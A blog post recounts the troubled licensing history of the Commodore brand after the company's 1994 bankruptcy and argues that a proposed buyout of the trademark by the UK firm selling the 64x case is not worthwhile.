What prompted this post is a Retro Recipes video (not affiliated) stating that, in answer to a request for a very broad license to distribute under the Commodore name, Commodore Corporation BV instead simply proposed he buy them out, which would obviously transfer the trademark to him outright. Amiga News has a very nice summary.

There was a time when Commodore intellectual property and the Commodore brand had substantial value, and that time probably ended around the mid-2000s. Prior to that point, after Commodore went bankrupt in 1994, a lot of residual affection for the Amiga and the 64/128 still circulated, the AmigaOS still had viability for some applications, and there might have been something to learn from the hardware, particularly the odder corners like the PA-RISC Hombre. That's why there was so much turmoil over the corpse, from Escom's abortive buyout to the split of the assets. Today the Commodore name (after many shifts and purchases and reorgs) is held by Commodore Corporation BV, a Netherlands company, who licenses it out. Pretty much the rest of it is split into the hardware patents (now with Acer after their buyout of Gateway 2000) and the remaining IP (Amiga Corporation, effectively Cloanto).

The Commodore brand after the company's demise has had an exceptionally poor track record in the market. Many of us remember the 1999 Commodore 64 Web.it, licensed by Escom, which was a disastrously bad set-top 486 PC sold as an "Internet computer" whose only link to CBM was the Commodore name and a built-in 64 emulator. Reviewers savaged it and they've become collectors' items purely for the lulz.

In 2007, Tulip licensee Commodore Gaming tried again with PC gaming rigs sold as the Commodore XX, GS, GX and G (are these computers or MPAA ratings?) and special wraps called C=kins (say it "skins"). I went to the launch party in L.A. - 8-Bit Weapon was there, hi Seth and Michelle! - and I even have one of their T-shirts around someplace. The company subsequently ran out of money, and their most consequential legacy was the huge and heavily branded case.

More recently, in 2010, an American company calling itself Commodore USA LLC tried developing new keyboard computers, most notably the (first) Commodore 64x. These were otherwise underpowered PCs using mini-ATX motherboards in breadboard-like cases where cooling was an obvious issue. They also tried selling "VICs" (which didn't look like VIC-20s) and "Amigas" (which were Intel i7 systems), and introduced their own Linux-based Commodore OS. Opinions were harsh, and the company went under after its CEO died in 2012.

Dishonourable mentions include Tulip-Yeahronimo's 2004 MP3 player line, sold as the (inexplicably) e-VIC, m-PET and f-PET, and the PET smartphone, a 2015 otherwise unremarkable Android device with its own collection of on-board emulators. No points for guessing how much of an impact those made.
And none of this is really specific to Commodore, either: look at the shambling corpse of Atari SA, made to dance on decaying strings by the former Infogrames principals. I mean, cryptocurrency and hotels straight out of Blade Runner - really?

The exception to the rule was the 2004 C64DTV, a Tulip-licensed all-in-one direct-to-TV console containing a miniaturized and enhanced Commodore 64, designed by Jeri Ellsworth and housed in a Competition Pro-style joystick. It played many built-in games from flash storage, but more importantly it could be easily modded into a distinct Commodore computer of its own, complete with keyboard and IEC serial ports, and VICE even emulates it. It sold well enough to go through two additional hardware revisions, and the system turned up in other contemporary DTVs (like the DTV3 in the Hummer DTV game).

There are also the 2019 "TheC64" machines, in both mini and full-size varieties (not affiliated), which are pretty much modern direct-to-TV systems in breadbin cases that run built-in games under emulation. The inclusion of USB "Comp Pro"-styled joysticks is an obvious secondary homage to the C64DTV. Notably, Retro Games Ltd licensed the Commodore 64 ROMs from Cloanto but didn't license the Commodore trademark, so the name Commodore never appears anywhere on the box or the machine (though you decide if the trade dress is infringing).

The remnant of the 64x was its case moulds, which were bought by My Retro Computer Ltd in the UK after Commodore USA LLC went under, and that's where this story picks up: they have been selling an officially licensed new version of the 64x (also not affiliated) since Commodore Corporation BV granted permission in 2022. This new 64x comes in three pre-built configurations or as a bare case. By buying out the Commodore name, they would get to sell these without the (frankly exorbitant) fees CC BV was charging, and could extend the brand to other existing Commodore re-creations like the Mega 65. But the video also has more nebulous aims, such as other retro Commodore products (Jeri Ellsworth herself appears in the video), something I didn't quite follow about a Commodore charity arcade for children's hospitals, and other very enthusiastically expressed yet moderately unclear goals.

I've been careful not to say there's no point in buying the Commodore trademark - I said there's not much. There is clearly a market for reimplementing classic Commodore hardware; Ellsworth herself proved it with the C64DTV, and current devices like the (also not affiliated with any) Mega 65, Ultimate64 and Kawari VIC-II still sell. But outside of the retro niche, Commodore as a brand name is pretty damn dead. Retro items sell only small numbers in boutique markets. Commodore PCs and Commodore smartphones don't sell, because the Commodore name adds nothing now to a PC or handset, and the way we work with modern machines - for better or worse - is worlds different than how we worked with a 1982 home computer. No one expects to interact with, say, a Web page or a smartphone app in the same way we used a BASIC program or a 5.25" floppy. Maybe we should, but we don't.

Furthermore, there's also the very pertinent question of how to steward such a community resource. The effort is clearly earnest, genuine and heartfelt, but that's not enough without governance.
Letting these obviously hobbyist projects become full-fledged members of the extended Commodore family seems reasonable and even appropriate, but then there's the issue of preventing the Shenzhen back-alley cloners from ripping them (and you) off. Plus, even these small products do make some money. What's FRAND in a situation like this? How would you enforce it? Should you enforce it? Does everyone who chips in get some fraction of a vote or some piece of the action? If the idea is only to allow the Commodore name to be applied to projects of sufficient quality and/or community benefit, who decides?

Better to let it rest in peace and stop encouraging these bloodsuckers to drain what life and goodwill remain in the Commodore name. The crap products that came before only benefited the licensor and just made the brand more tawdry. CC BV only gets to do what it does because it's allowed to. TheC64 systems sold without the Commodore trademark because it was obvious what they were and what they did; Mega 65s and Ultimate64s are in the same boat. Commodore enthusiasts like me know what these systems are. We'll buy them on their merits, or not, whether the Commodore name is on the label, or not (and they will likely be cheaper if it's not). CC BV has reportedly been trying to sell off the trademark for a while, which seems to hint that they too recognize the futility. Don't fall into their trap.

a week ago 11 votes